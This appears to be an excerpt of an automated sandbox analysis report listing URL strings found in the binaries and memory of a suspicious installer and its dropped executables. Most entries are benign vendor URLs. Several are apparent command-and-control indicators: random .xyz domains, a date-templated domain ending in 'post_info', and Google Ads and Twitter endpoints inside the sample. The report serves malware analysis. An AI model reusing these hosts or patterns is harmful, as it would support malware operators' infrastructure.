Source: ecvAA35.tmp.11.drString found in binary or memory: http://ocsp.pki.goog/GTSGIAG30
Source: ecvAA35.tmp.11.drString found in binary or memory: http://ocsp.pki.goog/gsr202
Source: ecvAA35.tmp.11.drString found in binary or memory: http://ocsp.pki.goog/gts1o1core0
Source: FileSetup-v17.04.41.exeString found in binary or memory: http://ocsp.thawte.com0
Source: ecvAA35.tmp.11.drString found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0
Source: ecvAA35.tmp.11.drString found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0#
Source: ecvAA35.tmp.11.drString found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0M
Source: ecvAA35.tmp.11.drString found in binary or memory: http://pki.goog/gsr2/GTSGIAG3.crt0)
Source: download_engine.dll.4.drString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: download_engine.dll.4.drString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: 6852B33702F6B3BD.exe, 00000004.00000003.304868433.0000000003CBF000.00000004.00000001.sdmpString found in binary or memory: http://service.real.com/realplayer/security/02062012_player/en/
Source: FileSetup-v17.04.41.exeString found in binary or memory: http://sf.symcb.com/sf.crl0f
Source: FileSetup-v17.04.41.exeString found in binary or memory: http://sf.symcb.com/sf.crt0
Source: FileSetup-v17.04.41.exeString found in binary or memory: http://sf.symcd.com0&
Source: ecvAA35.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/975a7d20/webcore/externalscripts/jquery/jquer
Source: ecvAA35.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/f60532dd-2923b6c2/directio
Source: ecvAA35.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/f60532dd-f8dd99d9/directio
Source: ecvAA35.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/11/755f86.png
Source: ecvAA35.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: ecvAA35.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/64/a8a064.gif
Source: ecvAA35.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/9b/e151e5.gif
Source: ecvAA35.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/ea/4996b9.woff
Source: ecvAA35.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAyuliQ.img?h=16&w=16&m
Source: ecvAA35.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAzjSw3.img?h=16&w=16&m
Source: ecvAA35.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB16g6qc.img?h=27&w=27&
Source: ecvAA35.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17milU.img?h=16&w=16&
Source: ecvAA35.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB18T33l.img?h=333&w=31
Source: ecvAA35.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19x3nX.img?h=166&w=31
Source: ecvAA35.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xCDZ.img?h=75&w=100
Source: ecvAA35.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xGDT.img?h=166&w=31
Source: ecvAA35.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xMWp.img?h=75&w=100
Source: ecvAA35.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xaUu.img?h=166&w=31
Source: ecvAA35.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xssM.img?h=75&w=100
Source: ecvAA35.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xzm6.img?h=250&w=30
Source: ecvAA35.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yF6n.img?h=333&w=31
Source: ecvAA35.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yFoT.img?h=75&w=100
Source: ecvAA35.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yuvA.img?h=250&w=30
Source: ecvAA35.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yxVU.img?h=166&w=31
Source: ecvAA35.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB7hjL.img?h=16&w=16&m=
Source: ecvAA35.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBO5Geh.img?h=16&w=16&m
Source: ecvAA35.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w=27&m
Source: ecvAA35.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBVuddh.img?h=16&w=16&m
Source: ecvAA35.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBX2afX.img?h=27&w=27&m
Source: ecvAA35.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBi9v6.img?m=6&o=true&u
Source: ecvAA35.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBnYSFZ.img?h=16&w=16&m
Source: MiniThunderPlatform.exe.4.drString found in binary or memory: http://store.paycenter.uc.cn
Source: MiniThunderPlatform.exe.4.drString found in binary or memory: http://store.paycenter.uc.cnmail-attachment.googleusercontent.com
Source: FileSetup-v17.04.41.exeString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: FileSetup-v17.04.41.exeString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: FileSetup-v17.04.41.exeString found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: 6852B33702F6B3BD.exe, 00000004.00000003.304890427.0000000003D65000.00000004.00000001.sdmpString found in binary or memory: http://www.google.com/earth/explore/products/plugin.html
Source: 6852B33702F6B3BD.exe, 00000005.00000002.293176364.000000000364F000.00000004.00000001.sdmpString found in binary or memory: http://www.interestvideo.com/video1.php
Source: 6852B33702F6B3BD.exe, 00000004.00000003.305037928.0000000003CB2000.00000004.00000001.sdmpString found in binary or memory: http://www.interoperabilitybridges.com/wmp-extension-for-chrome
Source: ecvAA35.tmp.11.drString found in binary or memory: http://www.msn.com
Source: ecvAA35.tmp.11.drString found in binary or memory: http://www.msn.com/
Source: ecvAA35.tmp.11.drString found in binary or memory: http://www.msn.com/?ocid=iehp
Source: ecvAA35.tmp.11.drString found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp
Source: ecvAA35.tmp.11.drString found in binary or memory: http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/consent/55a804
Source: ecvAA35.tmp.11.drString found in binary or memory: http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/scripttemplate
Source: 1611946678493.exe, 0000000B.00000002.283027571.0000000000198000.00000004.00000010.sdmpString found in binary or memory: http://www.nirsoft.net
Source: 1611946678493.exe, 1611946678493.exe.4.drString found in binary or memory: http://www.nirsoft.net/
Source: FileSetup-v17.04.41.exeString found in binary or memory: http://www.openssl.org/support/faq.html
Source: FileSetup-v17.04.41.exe, download_engine.dll.4.drString found in binary or memory: http://www.openssl.org/support/faq.html....................
Source: download_engine.dll.4.drString found in binary or memory: http://www.xunlei.com/
Source: download_engine.dll.4.drString found in binary or memory: http://www.xunlei.com/GET
Source: 6852B33702F6B3BD.exeString found in binary or memory: http://www.youtube.com
Source: 6852B33702F6B3BD.exe, 00000005.00000003.278156648.0000000003DDE000.00000004.00000001.sdmpString found in binary or memory: http://www.youtube.com//a
Source: 6852B33702F6B3BD.exe, 00000005.00000003.278156648.0000000003DDE000.00000004.00000001.sdmpString found in binary or memory: http://www.youtube.comz/
Source: ecvAA35.tmp.11.drString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4476872748356;g
Source: ecvAA35.tmp.11.drString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=68568119166
Source: ecvAA35.tmp.11.drString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=1463674
Source: 6852B33702F6B3BD.exe, 00000004.00000003.383784768.0000000002227000.00000004.00000040.sdmpString found in binary or memory: https://A5D4CE54CC78B3CA.xyz/
Source: 6852B33702F6B3BD.exe, 00000004.00000003.324597044.0000000000792000.00000004.00000001.sdmp, Localwebdata1611946694399.4.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 6852B33702F6B3BD.exe, 6852B33702F6B3BD.exe, 00000005.00000003.277169134.0000000003DD7000.00000004.00000001.sdmpString found in binary or memory: https://accounts.google.com
Source: 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpString found in binary or memory: https://ads.google.com/nav/_/rpc/GaiaInfoService/Get?authuser=0&rpcTrackingId=GaiaInfoService.Get%3A
Source: 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpString found in binary or memory: https://ads.google.com/nav/_/rpc/UserByGaiaService/Get?authuser=0&rpcTrackingId=UserByGaiaService.Ge
Source: 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpString found in binary or memory: https://ads.google.com/nav/_/rpc/UserCustomerAccessService/List?authuser=0&rpcTrackingId=UserCustome
Source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpString found in binary or memory: https://ads.google.com/nav/selectaccount
Source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpString found in binary or memory: https://ads.google.com/nav/selectaccountocation:
Source: 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpString found in binary or memory: https://ads.google.comsec-fetch-dest:
Source: ecvAA35.tmp.11.drString found in binary or memory: https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gt
Source: ecvAA35.tmp.11.drString found in binary or memory: https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=
Source: ecvAA35.tmp.11.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
Source: ecvAA35.tmp.11.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth
Source: ecvAA35.tmp.11.drString found in binary or memory: https://amp.azure.net/libs/amp/1.8.0/azuremediaplayer.min.js
Source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpString found in binary or memory: https://api.twitter.com/1.1/statuses/update.json
Source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpString found in binary or memory: https://api.twitter.com/1.1/statuses/update.jsoninclude_profile_interstitial_type=1&include_blocking
Source: 6852B33702F6B3BD.exe, 6852B33702F6B3BD.exe, 00000005.00000003.277169134.0000000003DD7000.00000004.00000001.sdmpString found in binary or memory: https://apis.google.com
Source: ecvAA35.tmp.11.drString found in binary or memory: https://arc.msn.com/v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=314559&adm=
Source: ecvAA35.tmp.11.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC54c8a2b02c3446f48a60b41e8a5ff47
Source: ecvAA35.tmp.11.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC5bdddb231cf54f958a5b6e76e9d8eee
Source: ecvAA35.tmp.11.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC828bc1cde9f04b788c98b5423157734
Source: ecvAA35.tmp.11.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC9b2d2bc73c8a4a1d8dd5c3d69b6634a
Source: ecvAA35.tmp.11.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCc13122162a9a46c3b4cbf05ffccde0f
Source: ecvAA35.tmp.11.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCc71c68d7b8f049b6a6f3b669bd5d00c
Source: ecvAA35.tmp.11.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCee0d4d5fd4424c8390d703b105f82c3
Source: ecvAA35.tmp.11.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCfd484f9188564713bbc5d13d862ebbf
Source: ecvAA35.tmp.11.drString found in binary or memory: https://assets.adobedtm.com/launch-EN7b3d710ac67a4a1195648458258f97dd.min.js
Source: ecvAA35.tmp.11.drString found in binary or memory: https://az416426.vo.msecnd.net/scripts/a/ai.0.js
Source: ecvAA35.tmp.11.drString found in binary or memory: https://az725175.vo.msecnd.net/scripts/jsll-4.js
Source: 6852B33702F6B3BD.exe, 00000004.00000003.324597044.0000000000792000.00000004.00000001.sdmp, Localwebdata1611946694399.4.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 6852B33702F6B3BD.exe, 00000005.00000003.287736856.0000000002372000.00000004.00000040.sdmpString found in binary or memory: https://chrome.google.com/webstore
Source: 6852B33702F6B3BD.exe, 00000005.00000003.277967504.0000000003E5B000.00000004.00000001.sdmp, background.js.5.drString found in binary or memory: https://chrome.google.com/webstore/category/extension
Source: 6852B33702F6B3BD.exe, 00000005.00000003.278524081.000000000237C000.00000004.00000001.sdmpString found in binary or memory: https://chrome.google.com/webstoreAAjb
Source: 6852B33702F6B3BD.exeString found in binary or memory: https://clients2.google.com/service/update2/cr
Source: 6852B33702F6B3BD.exe, 00000005.00000003.287876756.0000000003DD0000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000003.287851020.0000000003DDB000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000003.287736856.0000000002372000.00000004.00000040.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx
Source: 6852B33702F6B3BD.exe, 00000005.00000003.287833605.000000000237D000.00000004.00000001.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx1
Source: 6852B33702F6B3BD.exe, 00000005.00000003.278156648.0000000003DDE000.00000004.00000001.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx:-
Source: 6852B33702F6B3BD.exe, 00000005.00000003.278156648.0000000003DDE000.00000004.00000001.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crxI
Source: 6852B33702F6B3BD.exe, 00000005.00000003.278156648.0000000003DDE000.00000004.00000001.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crxp1M
Source: 6852B33702F6B3BD.exe, 6852B33702F6B3BD.exe, 00000005.00000003.277169134.0000000003DD7000.00000004.00000001.sdmpString found in binary or memory: https://content.googleapis.com
Source: ecvAA35.tmp.11.drString found in binary or memory: https://contextual.media.net/
Source: ecvAA35.tmp.11.drString found in binary or memory: https://contextual.media.net/48/nrrV18753.js
Source: ecvAA35.tmp.11.drString found in binary or memory: https://contextual.media.net/803288796/fcmain.js?&gdpr=0&cid=8CU157172&cpcd=pC3JHgSCqY8UHihgrvGr0A%3
Source: ecvAA35.tmp.11.drString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
Source: ecvAA35.tmp.11.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
Source: ecvAA35.tmp.11.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
Source: 6852B33702F6B3BD.exe, 00000004.00000002.386867102.000000000340F000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293176364.000000000364F000.00000004.00000001.sdmpString found in binary or memory: https://curl.haxx.se/docs/http-cookies.html
Source: ecvAA35.tmp.11.drString found in binary or memory: https://cvision.media.net/new/300x300/3/167/174/27/39ab3103-8560-4a55-bfc4-401f897cf6f2.jpg?v=9
Source: FileSetup-v17.04.41.exeString found in binary or memory: https://d.symcb.com/cps0%
Source: FileSetup-v17.04.41.exeString found in binary or memory: https://d.symcb.com/rpa0
Source: ecvAA35.tmp.11.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: ecvAA35.tmp.11.drString found in binary or memory: https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7BFD3B6173
Source: 6852B33702F6B3BD.exe, 6852B33702F6B3BD.exe, 00000005.00000003.278094503.0000000003E07000.00000004.00000001.sdmpString found in binary or memory: https://docs.google.com/
Source: 6852B33702F6B3BD.exe, 00000005.00000003.278156648.0000000003DDE000.00000004.00000001.sdmpString found in binary or memory: https://docs.google.com/C/u
Source: 6852B33702F6B3BD.exe, 6852B33702F6B3BD.exe, 00000005.00000003.278094503.0000000003E07000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/
Source: 6852B33702F6B3BD.exeString found in binary or memory: https://drive.google.com/?usp=chrome_app
Source: 6852B33702F6B3BD.exe, 00000005.00000003.278156648.0000000003DDE000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/?usp=chrome_appk/B
Source: 6852B33702F6B3BD.exe, 00000005.00000003.278156648.0000000003DDE000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/F/x
Source: 6852B33702F6B3BD.exeString found in binary or memory: https://drive.google.com/drive/settings
Source: 6852B33702F6B3BD.exe, 00000005.00000003.278156648.0000000003DDE000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/drive/settingsawl7
Source: 6852B33702F6B3BD.exe, 00000004.00000003.324597044.0000000000792000.00000004.00000001.sdmp, Localwebdata1611946694399.4.drString found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 6852B33702F6B3BD.exe, 00000004.00000003.324597044.0000000000792000.00000004.00000001.sdmp, Localwebdata1611946694399.4.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 6852B33702F6B3BD.exe, 00000004.00000003.324597044.0000000000792000.00000004.00000001.sdmp, Localwebdata1611946694399.4.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpString found in binary or memory: https://exchangework%04d%02d%02d.xyz/http://changenewsys%04d%02d%02d.xyz/post_info.
Source: 6852B33702F6B3BD.exe, 6852B33702F6B3BD.exe, 00000005.00000003.277169134.0000000003DD7000.00000004.00000001.sdmpString found in binary or memory: https://feedback.googleusercontent.com
Source: ecvAA35.tmp.11.drString found in binary or memory: https://fonts.googleapis.com/css?family=Google
Source: 6852B33702F6B3BD.exe, 6852B33702F6B3BD.exe, 00000005.00000003.277169134.0000000003DD7000.00000004.00000001.sdmpString found in binary or memory: https://fonts.googleapis.com;
Source: ecvAA35.tmp.11.drString found in binary or memory: https://fonts.gstatic.com/s/googlesans/v16/4UaGrENHsxJlGDuGo1OIlI3K.woff
Source: ecvAA35.tmp.11.drString found in binary or memory: https://fonts.gstatic.com/s/googlesans/v16/4UabrENHsxJlGDuGo1OIlLU94bt3.woff
Source: ecvAA35.tmp.11.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v20/KFOlCnqEu92Fr1MmEU9vAA.woff
Source: ecvAA35.tmp.11.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v20/KFOmCnqEu92Fr1Me5g.woff
Source: 6852B33702F6B3BD.exe, 6852B33702F6B3BD.exe, 00000005.00000003.277169134.0000000003DD7000.00000004.00000001.sdmpString found in binary or memory: https://fonts.gstatic.com;
Source: 6852B33702F6B3BD.exe, 00000005.00000002.289473954.000000000087B000.00000004.00000020.sdmpString found in binary or memory: https://fsfba021a5a6662.xyz/
Source: ecvAA35.tmp.11.drString found in binary or memory: https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location
Source: ecvAA35.tmp.11.drString found in binary or memory: https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml
Source: 6852B33702F6B3BD.exeString found in binary or memory: https://hangouts.google.com/
Source: ecvAA35.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE1Mu3b?ver=5c31
Source: ecvAA35.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4DnuZ
Source: ecvAA35.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4Dnv6
Source: ecvAA35.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4Dnwt
Source: ecvAA35.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4DsDH
Source: ecvAA35.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmQ
Source: ecvAA35.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmV
Source: ecvAA35.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmZ
Source: ecvAA35.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FGwC
Source: ecvAA35.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4n1yl
Source: ecvAA35.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4n4cm
Source: ecvAA35.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ncJ7
Source: ecvAA35.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ncJa
Source: ecvAA35.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4nqTh
Source: ecvAA35.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4sQww?ver=37ff
Source: ecvAA35.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tD2S
Source: ecvAA35.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tG3O
Source: ecvAA35.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tIoW
Source: ecvAA35.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tIoY
Source: ecvAA35.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tKUA
Source: ecvAA35.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tMOD
Source: ecvAA35.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tMOM
Source: ecvAA35.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tQVa
Source: ecvAA35.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4u1kF
Source: ecvAA35.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ubMD
Source: ecvAA35.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4wqj5
Source: ecvAA35.tmp.11.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4zuiC
Source: ecvAA35.tmp.11.drString found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
Source: ecvAA35.tmp.11.drString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1601452923&rver=6.0.5286.0&wp=MBI_SSL&wre
Source: ecvAA35.tmp.11.drString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: ecvAA35.tmp.11.drString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: ecvAA35.tmp.11.drString found in binary or memory: https://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e
Source: ecvAA35.tmp.11.drString found in binary or memory: https://logincdn.msauth.net/16.000.28666.10/content/images/ellipsis_white_5ac590ee72bfe06a7cecfd75b5
Source: ecvAA35.tmp.11.drString found in binary or memory: https://logincdn.msauth.net/16.000.28666.10/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc1937
Source: ecvAA35.tmp.11.drString found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v21033_-0mnSwu67knBd7qR7YN9GQ2.css
Source: ecvAA35.tmp.11.drString found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en_5QoHC_ilFOmb96M0pIeJ
Source: ecvAA35.tmp.11.drString found in binary or memory: https://logincdn.msauth.net/16.000/content/js/OldConvergedLogin_PCore_xqcDwEKeDux9oCNjuqEZ-A2.js
Source: 6852B33702F6B3BD.exe, 6852B33702F6B3BD.exe, 00000005.00000003.277169134.0000000003DD7000.00000004.00000001.sdmpString found in binary or memory: https://mail.google.com/mail
Source: 6852B33702F6B3BD.exe, 6852B33702F6B3BD.exe, 00000005.00000003.277169134.0000000003DD7000.00000004.00000001.sdmpString found in binary or memory: https://mail.google.com/mail/#settings
Source: ecvAA35.tmp.11.drString found in binary or memory: https://maps.windows.com/windows-app-web-link
Source: ecvAA35.tmp.11.drString found in binary or memory: https://mwf-service.akamaized.net/mwf/css/bundle/1.57.0/west-european/default/mwf-main.min.css
Source: ecvAA35.tmp.11.drString found in binary or memory: https://mwf-service.akamaized.net/mwf/js/bundle/1.57.0/mwf-auto-init-main.var.min.js
Source: ecvAA35.tmp.11.drString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2020-07-22-21-45-19/PreSignInSettingsConfig.json
Source: ecvAA35.tmp.11.drString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2020-07-24-17-35-16/PreSignInSettingsConfig.json?One
Source: ecvAA35.tmp.11.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/20.124.0621.0006/update10.xml?OneDriveUpdate=79d8737dc86cbccc6833c
Source: ecvAA35.tmp.11.drString found in binary or memory: https://onecs-live.azureedge.net/api/settings/en-US/xml/settings-tipset?release=rs4
Source: 6852B33702F6B3BD.exe, 6852B33702F6B3BD.exe, 00000005.00000003.278156648.0000000003DDE000.00000004.00000001.sdmpString found in binary or memory: https://payments.google.com/
Source: 6852B33702F6B3BD.exeString found in binary or memory: https://payments.google.com/payments/v4/js/integrator.js
Source: 6852B33702F6B3BD.exe, 00000005.00000003.277169134.0000000003DD7000.00000004.00000001.sdmpString found in binary or memory: https://payments.google.com/payments/v4/js/integrator.jstW2
